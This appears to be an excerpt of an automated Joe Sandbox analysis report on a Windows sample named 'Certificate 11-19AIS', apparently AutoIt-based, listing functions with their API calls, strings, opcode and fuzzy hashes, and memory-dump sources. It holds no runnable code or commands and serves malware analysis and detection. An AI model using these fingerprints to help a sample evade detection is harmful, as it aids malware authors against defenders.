                                                                              • Instruction Fuzzy Hash: D1F03A72242258BBE7215BA2AC0EEEF7B7CEFC6B11F000418FA1191151E7A05A41D6B5
                                                                              Function 007F9A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 007F9A33
                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,00825DEE,?,?,?,?,?,007BED63), ref: 007F9A44
                                                                              • TerminateThread.KERNEL32(?,000001F6,?,?,?,00825DEE,?,?,?,?,?,007BED63), ref: 007F9A51
                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00825DEE,?,?,?,?,?,007BED63), ref: 007F9A5E
                                                                                • Part of subcall function 007F93D1: CloseHandle.KERNEL32(?,?,007F9A6B,?,?,?,00825DEE,?,?,?,?,?,007BED63), ref: 007F93DB
                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 007F9A71
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,00825DEE,?,?,?,?,?,007BED63), ref: 007F9A78
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                              • String ID:
                                                                              • API String ID: 3495660284-0
                                                                              • Opcode ID: ce53c4d3cf54a8b7f928f89cc279310e0eccc9bba0ee70dcc639cff06ef484b5
                                                                              • Instruction ID: ec6ce175f3b5fb522bef07d3f4f1f770f706287700c3a80ae92ff3dfa80c3fdc
                                                                              • Opcode Fuzzy Hash: ce53c4d3cf54a8b7f928f89cc279310e0eccc9bba0ee70dcc639cff06ef484b5
                                                                              • Instruction Fuzzy Hash: C8F08232141311ABD7111BA4FC8DEEB773AFFC4302B140825F703911A1DBB9A811DB51
                                                                              Function 007B1CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007CF4EA: std::exception::exception.LIBCMT ref: 007CF51E
                                                                                • Part of subcall function 007CF4EA: __CxxThrowException@8.LIBCMT ref: 007CF533
                                                                              • __swprintf.LIBCMT ref: 007B1EA6
                                                                              Strings
                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 007B1D49
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                              • API String ID: 2125237772-557222456
                                                                              • Opcode ID: 8c537c42450f5edff3f486ab786846bba0a4306c7f3e96775f910dea23429419
                                                                              • Instruction ID: 7450e677f9a359779b8ab691e247d53d7742b23ece826f6816eb9c841bda1fa4
                                                                              • Opcode Fuzzy Hash: 8c537c42450f5edff3f486ab786846bba0a4306c7f3e96775f910dea23429419
                                                                              • Instruction Fuzzy Hash: 01917971108211DFC724EF24C899EAEB7A4FF85700F40492DF985972A2DB78EE45CB92
                                                                              Function 0080AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 0080B006
                                                                              • CharUpperBuffW.USER32(?,?), ref: 0080B115
                                                                              • VariantClear.OLEAUT32(?), ref: 0080B298
                                                                                • Part of subcall function 007F9DC5: VariantInit.OLEAUT32(00000000), ref: 007F9E05
                                                                                • Part of subcall function 007F9DC5: VariantCopy.OLEAUT32(?,?), ref: 007F9E0E
                                                                                • Part of subcall function 007F9DC5: VariantClear.OLEAUT32(?), ref: 007F9E1A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                              • API String ID: 4237274167-1221869570
                                                                              • Opcode ID: e21be56a7c018a87e21c1af62b0029fc07506a1ac514f786d319cd918e6ca09e
                                                                              • Instruction ID: 25a2f365c8539050e6ed31ee0e8ecf804798deea1c08bd630bb707365116e1ea
                                                                              • Opcode Fuzzy Hash: e21be56a7c018a87e21c1af62b0029fc07506a1ac514f786d319cd918e6ca09e
                                                                              • Instruction Fuzzy Hash: 08912770608305DFCB50DF24C885A9AB7E4FF89704F04886DF99ADB2A2DB35E905CB52
                                                                              Function 007F5347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007CC6F4: _wcscpy.LIBCMT ref: 007CC717
                                                                              • _memset.LIBCMT ref: 007F5438
                                                                              • GetMenuItemInfoW.USER32(?), ref: 007F5467
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007F5513
                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007F553D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                              • String ID: 0
                                                                              • API String ID: 4152858687-4108050209
                                                                              • Opcode ID: 53b7dc04e241a97bd610c12c9e812f93a585681482ac70526a72cfb1eef4bf00
                                                                              • Instruction ID: 80577db7551d1494b3a0ba9273ed2ebd403b64b0a455e3debcb40438dd4066c8
                                                                              • Opcode Fuzzy Hash: 53b7dc04e241a97bd610c12c9e812f93a585681482ac70526a72cfb1eef4bf00
                                                                              • Instruction Fuzzy Hash: 925121712087099BD7149B2CC8497BBB7EAEF85364F14062AFB99C3291DB68CC448B52
                                                                              Function 007F0213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007F027B
                                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007F02B1
                                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007F02C2
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007F0344
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                              • String ID: DllGetClassObject
                                                                              • API String ID: 753597075-1075368562
                                                                              • Opcode ID: 14e7a58a0d13bc8df1bb45820057f27cea04d667840046395fddc1342fe9cea4
                                                                              • Instruction ID: 19cc86e7869acf18b0e9c785b3ad44fec9c50dc66fa275506671ac77c68ebd5b
                                                                              • Opcode Fuzzy Hash: 14e7a58a0d13bc8df1bb45820057f27cea04d667840046395fddc1342fe9cea4
                                                                              • Instruction Fuzzy Hash: 26414DB1600208EFDB15CF64C984BAA7BB9EF45310B1480ADEA09DF306D7B9D944DBE0
                                                                              Function 007F5007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007F5075
                                                                              • GetMenuItemInfoW.USER32 ref: 007F5091
                                                                              • DeleteMenu.USER32(00000004,00000007,00000000), ref: 007F50D7
                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00871708,00000000), ref: 007F5120
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1173514356-4108050209
                                                                              • Opcode ID: e952ad23e6e5c15500f03c2bda545d2abfac0c62c2347103d5c4c04e8c6cf70b
                                                                              • Instruction ID: 8e6de2ea9fae874ecbd15a4d529493ad05808de86f6ca93cace8d261f5b8f535
                                                                              • Opcode Fuzzy Hash: e952ad23e6e5c15500f03c2bda545d2abfac0c62c2347103d5c4c04e8c6cf70b
                                                                              • Instruction Fuzzy Hash: 6641C130208709EFD720DF28D885B6AB7E8AF85324F144A1EFB6597391D774E804CB62
                                                                              Function 007FE698 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007FE742
                                                                              • GetLastError.KERNEL32(?,00000000), ref: 007FE768
                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007FE78D
                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007FE7B9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                              • String ID: p1ou`Kpu
                                                                              • API String ID: 3321077145-1196383048
                                                                              • Opcode ID: df2d6d68a3395c5b9e0eaa5171e9fed0646d307df86f23d39f8c3b5b1c7a1504
                                                                              • Instruction ID: c94f20bae882a9dc8469fe370ebb30fe2f2bd202db821c77cdcdaea275f91a5c
                                                                              • Opcode Fuzzy Hash: df2d6d68a3395c5b9e0eaa5171e9fed0646d307df86f23d39f8c3b5b1c7a1504
                                                                              • Instruction Fuzzy Hash: 9B415B39200614DFCF11EF15C548A9DBBE5BF99710B098498EA56AB3B2CB38FC00CB91
                                                                              Function 00810567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharLowerBuffW.USER32(?,?,?,?), ref: 00810587
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharLower
                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                              • API String ID: 2358735015-567219261
                                                                              • Opcode ID: aaee835e220791abf7d79f0db87c5458192e160aa7d49fe1aa0d52ca3e6c03a7
                                                                              • Instruction ID: 38b320593f56c091c1a4c3d02063e7c9dd5891581581b48531269be2fbe4b459
                                                                              • Opcode Fuzzy Hash: aaee835e220791abf7d79f0db87c5458192e160aa7d49fe1aa0d52ca3e6c03a7
                                                                              • Instruction Fuzzy Hash: 45317E7050021AEBCF10EF54CC45AEEB3B8FF55314F108629E826E76D1DBB5A995CB90
                                                                              Function 007EB80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007EB88E
                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007EB8A1
                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 007EB8D1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 3850602802-1403004172
                                                                              • Opcode ID: 967c2e589cb66831156908a7bd58c90ad2011b52f0abe841ee9a6b261c9ae7f4
                                                                              • Instruction ID: de1aaacb71d585c74ea594b8bec353269a4742c42656dc46ff8faf93d48fa0b3
                                                                              • Opcode Fuzzy Hash: 967c2e589cb66831156908a7bd58c90ad2011b52f0abe841ee9a6b261c9ae7f4
                                                                              • Instruction Fuzzy Hash: F62104B1901248EFDB04ABA5D88AEFF7B78EF59350B104129F021A62E0DB7C5D1686A0
                                                                              Function 008043E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00804401
                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00804427
                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00804457
                                                                              • InternetCloseHandle.WININET(00000000), ref: 0080449E
                                                                                • Part of subcall function 00805052: GetLastError.KERNEL32(?,?,008043CC,00000000,00000000,00000001), ref: 00805067
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                              • String ID:
                                                                              • API String ID: 1951874230-3916222277
                                                                              • Opcode ID: ef6c59e47da7e129a88b140d45ded25bc094015c204bf3831b3f9d0a9e979537
                                                                              • Instruction ID: 2544702d6b510d3a0c29fd762b651bec1d9328e39849cc9031ff67e8ba000d5f
                                                                              • Opcode Fuzzy Hash: ef6c59e47da7e129a88b140d45ded25bc094015c204bf3831b3f9d0a9e979537
                                                                              • Instruction Fuzzy Hash: 7321BEF2541A08BEE751AF64DC85EBFB6ECFF88748F10941AF209E2180EA648D059775
                                                                              Function 008190E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007CD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007CD1BA
                                                                                • Part of subcall function 007CD17C: GetStockObject.GDI32(00000011), ref: 007CD1CE
                                                                                • Part of subcall function 007CD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 007CD1D8
                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0081915C
                                                                              • LoadLibraryW.KERNEL32(?), ref: 00819163
                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00819178
                                                                              • DestroyWindow.USER32(?), ref: 00819180
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                              • String ID: SysAnimate32
                                                                              • API String ID: 4146253029-1011021900
                                                                              • Opcode ID: 2913dc2cb3743684243c11c33b11e83a66721f0ecc2c4e796c9f8ec5cd515293
                                                                              • Instruction ID: b865661bc7ffad84f4765fa173b3fd4578b198b99bc2b770bfe468b415919c64
                                                                              • Opcode Fuzzy Hash: 2913dc2cb3743684243c11c33b11e83a66721f0ecc2c4e796c9f8ec5cd515293
                                                                              • Instruction Fuzzy Hash: 1C219D7120020ABBEF204E64DCA9EFA37ADFF99364F110628FA94D2190D735DCD1A760
                                                                              Function 007F9568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 007F9588
                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007F95B9
                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 007F95CB
                                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007F9605
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandle$FilePipe
                                                                              • String ID: nul
                                                                              • API String ID: 4209266947-2873401336
                                                                              • Opcode ID: bdca7f73db0bc3d609ce9a991ad4645868ecf643473115bfb48b1428751bfa5e
                                                                              • Instruction ID: 20390256b064f649baf6e7923f1f8a94440491238462aa67857bb65d13d81a3e
                                                                              • Opcode Fuzzy Hash: bdca7f73db0bc3d609ce9a991ad4645868ecf643473115bfb48b1428751bfa5e
                                                                              • Instruction Fuzzy Hash: 4F218E70600309ABDB219F25DC05BAABBB8BF94720F204A19FBA1D73D0D774E950CB20
                                                                              Function 007F9634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 007F9653
                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007F9683
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 007F9694
                                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007F96CE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandle$FilePipe
                                                                              • String ID: nul
                                                                              • API String ID: 4209266947-2873401336
                                                                              • Opcode ID: b08b539089f00023202107f17fa96b1f6054ccdd0be706b05f0565888904f7c9
                                                                              • Instruction ID: d02324a015ff6c7ef020ed78b9db199c01da0245dc791047c7e9286832369f33
                                                                              • Opcode Fuzzy Hash: b08b539089f00023202107f17fa96b1f6054ccdd0be706b05f0565888904f7c9
                                                                              • Instruction Fuzzy Hash: 1C216D71600309DBDB209F699C44FAAB7B8BF95724F200A19FBA1E73D0E7749841CB50
                                                                              Function 007FDAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 007FDB0A
                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007FDB5E
                                                                              • __swprintf.LIBCMT ref: 007FDB77
                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0084DC00), ref: 007FDBB5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                              • String ID: %lu
                                                                              • API String ID: 3164766367-685833217
                                                                              • Opcode ID: ff47bedd76c9e91d97ed8dd241b835521dc910be7f1a5af2ebd364a266c4dc44
                                                                              • Instruction ID: dad49e41466d9ac68ec16f987b640099bbeecc663a94adcaf1f805ad3fb0572c
                                                                              • Opcode Fuzzy Hash: ff47bedd76c9e91d97ed8dd241b835521dc910be7f1a5af2ebd364a266c4dc44
                                                                              • Instruction Fuzzy Hash: 16217175600208EFCB11EFA4D989EEEB7B8EF88704B004069F605D7351DB74EA01DB61
                                                                              Function 007EC9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007EC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007EC84A
                                                                                • Part of subcall function 007EC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 007EC85D
                                                                                • Part of subcall function 007EC82D: GetCurrentThreadId.KERNEL32 ref: 007EC864
                                                                                • Part of subcall function 007EC82D: AttachThreadInput.USER32(00000000), ref: 007EC86B
                                                                              • GetFocus.USER32 ref: 007ECA05
